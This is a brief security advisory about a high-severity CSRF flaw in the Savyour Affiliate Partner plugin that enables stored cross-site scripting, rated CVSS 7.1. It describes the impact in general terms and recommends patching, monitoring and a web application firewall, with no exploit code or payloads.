A high-severity Cross-Site Request Forgery (CSRF) vulnerability in the Savyour Affiliate Partner plugin enables Stored XSS, potentially allowing an attacker to compromise the website.

The plugin is vulnerable to Cross-Site Request Forgery (CSRF). An unauthenticated attacker can create a malicious request that, if processed by an authenticated administrator's browser, will inject a persistent malicious script (Stored XSS) into the web application's database.

With a CVSS score of 7.1 (High), this vulnerability represents a significant security risk. An attacker could leverage this to execute arbitrary scripts in the browsers of website visitors and administrators. This can lead to session hijacking, defacement of the website, credential theft, or redirection to malicious sites, damaging the organization's reputation and user trust.

Immediate Action: Immediately update the Savyour Affiliate Partner plugin to the latest version that addresses this vulnerability.

Proactive Monitoring: Scan website pages and database entries for suspicious script tags or unexpected content. Monitor for administrative actions that were not intentionally performed.

Compensating Controls: Implement a Web Application Firewall (WAF) with robust rules against CSRF and XSS attacks to provide a layer of defense if immediate patching is not possible.

Public Exploit Available: false

This vulnerability provides a direct pathway for an attacker to gain control over the content and user sessions of the affected website. The High severity rating underscores the urgency of this issue. Administrators must prioritize updating the plugin to the patched version immediately.